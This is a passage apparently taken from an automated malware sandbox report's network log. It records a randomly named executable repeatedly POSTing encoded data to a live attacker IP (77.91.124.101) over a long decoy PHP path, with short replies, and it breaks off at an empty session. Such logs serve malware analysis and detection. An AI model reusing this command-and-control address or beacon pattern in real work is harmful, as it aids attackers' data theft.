Nov 21, 2023 04:48:38.297655106 CET	584	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.2.5	49821	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:37.894817114 CET	581	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:38.093694925 CET	582	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:38.093915939 CET	584	OUT	Data Raw: 52 5f 5d 5d 5b 5f 5f 5a 5d 57 55 57 55 5b 57 52 50 52 58 40 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_]][__Z]WUWU[WRPRX@VTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>82(9?0'[8$&\7*]) %'W&0:R,;><,;^/&G''^)3
Nov 21, 2023 04:48:38.297655106 CET	584	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.2.5	49822	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:38.613940001 CET	585	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:38.811933994 CET	586	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:38.812347889 CET	588	OUT	Data Raw: 52 5a 58 50 5e 5e 5a 5e 5d 57 55 57 55 5e 57 57 50 5b 58 44 56 56 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXP^^Z^]WUWU^WWP[XDVVW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(5<-*#\8B6 9>)0!$-!$#9-8!<<7/.&G''^)7
Nov 21, 2023 04:48:39.015322924 CET	588	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	77.91.124.101	80	192.168.2.5	49822	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:38.613940001 CET	585	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:38.811933994 CET	586	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:38.812347889 CET	588	OUT	Data Raw: 52 5a 58 50 5e 5e 5a 5e 5d 57 55 57 55 5e 57 57 50 5b 58 44 56 56 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXP^^Z^]WUWU^WWP[XDVVW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(5<-*#\8B6 9>)0!$-!$#9-8!<<7/.&G''^)7
Nov 21, 2023 04:48:39.015322924 CET	588	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	77.91.124.101	80	192.168.2.5	49823	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:39.338498116 CET	589	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:39.537868023 CET	589	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:39.538080931 CET	592	OUT	Data Raw: 57 5d 58 5e 5b 5d 5a 5d 5d 57 55 57 55 5a 57 50 50 5c 58 49 56 51 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]X^[]Z]]WUWUZWPP\XIVQW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(!Y=+W*3;2799(3-$.&& ":?Z ,>&G''^)7
Nov 21, 2023 04:48:39.741638899 CET	593	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.2.5	49823	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:39.338498116 CET	589	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:39.537868023 CET	589	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:39.538080931 CET	592	OUT	Data Raw: 57 5d 58 5e 5b 5d 5a 5d 5d 57 55 57 55 5a 57 50 50 5c 58 49 56 51 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]X^[]Z]]WUWUZWPP\XIVQW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(!Y=+W*3;2799(3-$.&& ":?Z ,>&G''^)7
Nov 21, 2023 04:48:39.741638899 CET	593	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	77.91.124.101	80	192.168.2.5	49824	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:39.740168095 CET	593	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:39.937958002 CET	594	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:39.938183069 CET	595	OUT	Data Raw: 57 5c 5d 5b 5b 59 5f 5a 5d 57 55 57 55 5c 57 55 50 53 58 44 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\][[Y_Z]WUWU\WUPSXDVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_);5<+*S)7Z/.\79)^+!'[9'9(=<_8&G''^)/
Nov 21, 2023 04:48:40.140853882 CET	599	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:39 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 03 25 3c 2c 5d 21 33 3f 1f 3c 2a 0c 08 2d 2e 25 18 2a 30 31 59 25 13 20 5f 24 07 04 08 3c 3f 2b 01 24 29 0e 54 20 18 01 05 2b 30 21 5a 0c 1d 26 17 36 16 0d 55 29 3d 38 5a 2b 13 28 17 31 08 3b 5e 28 58 2f 1b 20 30 33 5d 26 1d 30 51 2f 01 08 07 2e 16 32 41 31 05 21 07 23 2d 23 5f 0c 14 24 0b 36 32 2f 5e 34 30 32 50 22 0e 34 5d 20 0a 37 54 27 3d 34 56 26 38 2d 1a 2b 2b 2c 54 25 27 2f 0e 33 3a 33 1f 25 2a 37 51 28 00 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !%<,]!3?<-.%01Y% _$<?+$)T +0!Z&6U)=8Z+(1;^(X/ 03]&0Q/.2A1!#-#_$62/^402P"4] 7T'=4V&8-++,T%'/3:3%7Q(&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.2.5	49824	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:39.740168095 CET	593	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:39.937958002 CET	594	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:39.938183069 CET	595	OUT	Data Raw: 57 5c 5d 5b 5b 59 5f 5a 5d 57 55 57 55 5c 57 55 50 53 58 44 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\][[Y_Z]WUWU\WUPSXDVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_);5<+*S)7Z/.\79)^+!'[9'9(=<_8&G''^)/
Nov 21, 2023 04:48:40.140853882 CET	599	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:39 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 03 25 3c 2c 5d 21 33 3f 1f 3c 2a 0c 08 2d 2e 25 18 2a 30 31 59 25 13 20 5f 24 07 04 08 3c 3f 2b 01 24 29 0e 54 20 18 01 05 2b 30 21 5a 0c 1d 26 17 36 16 0d 55 29 3d 38 5a 2b 13 28 17 31 08 3b 5e 28 58 2f 1b 20 30 33 5d 26 1d 30 51 2f 01 08 07 2e 16 32 41 31 05 21 07 23 2d 23 5f 0c 14 24 0b 36 32 2f 5e 34 30 32 50 22 0e 34 5d 20 0a 37 54 27 3d 34 56 26 38 2d 1a 2b 2b 2c 54 25 27 2f 0e 33 3a 33 1f 25 2a 37 51 28 00 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !%<,]!3?<-.%01Y% _$<?+$)T +0!Z&6U)=8Z+(1;^(X/ 03]&0Q/.2A1!#-#_$62/^402P"4] 7T'=4V&8-++,T%'/3:3%7Q(&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49723	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:33.223157883 CET	185	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:33.420999050 CET	186	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:33.421247959 CET	188	OUT	Data Raw: 57 58 58 5c 5b 5e 5f 5c 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXX\[^_\]WUWU[WTP^X@VPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>8+;)>3'Z8'2[#:6)#.'=>30,8"^<';>&G''^)3
Nov 21, 2023 04:47:33.625627041 CET	188	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	77.91.124.101	80	192.168.2.5	49723	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:33.223157883 CET	185	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:33.420999050 CET	186	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:33.421247959 CET	188	OUT	Data Raw: 57 58 58 5c 5b 5e 5f 5c 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXX\[^_\]WUWU[WTP^X@VPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>8+;)>3'Z8'2[#:6)#.'=>30,8"^<';>&G''^)3
Nov 21, 2023 04:47:33.625627041 CET	188	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	77.91.124.101	80	192.168.2.5	49825	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:39.892560959 CET	594	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:40.090172052 CET	596	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:40.090675116 CET	598	OUT	Data Raw: 57 5c 5d 5a 5b 53 5a 5b 5d 57 55 57 55 56 57 56 50 53 58 47 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\]Z[SZ[]WUWUVWVPSXGVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+([<]1?0<8'2] )%_+-&--09"(\8.&G''^)
Nov 21, 2023 04:48:40.297071934 CET	599	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.2.5	49825	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:39.892560959 CET	594	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:40.090172052 CET	596	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:40.090675116 CET	598	OUT	Data Raw: 57 5c 5d 5a 5b 53 5a 5b 5d 57 55 57 55 56 57 56 50 53 58 47 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\]Z[SZ[]WUWUVWVPSXGVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+([<]1?0<8'2] )%_+-&--09"(\8.&G''^)
Nov 21, 2023 04:48:40.297071934 CET	599	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	77.91.124.101	80	192.168.2.5	49826	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:40.611051083 CET	600	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:40.808887005 CET	600	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:40.809181929 CET	603	OUT	Data Raw: 57 59 58 5a 5b 5e 5a 5f 5d 57 55 57 55 5c 57 56 50 52 58 41 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYXZ[^Z_]WUWU\WVPRXAVTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*=^<]%>#/"\ 9(3&W'>P0U9(>+<7],&G''^)/
Nov 21, 2023 04:48:41.011790991 CET	603	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.2.5	49826	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:40.611051083 CET	600	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:40.808887005 CET	600	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:40.809181929 CET	603	OUT	Data Raw: 57 59 58 5a 5b 5e 5a 5f 5d 57 55 57 55 5c 57 56 50 52 58 41 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYXZ[^Z_]WUWU\WVPRXAVTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*=^<]%>#/"\ 9(3&W'>P0U9(>+<7],&G''^)/
Nov 21, 2023 04:48:41.011790991 CET	603	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.2.5	49827	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
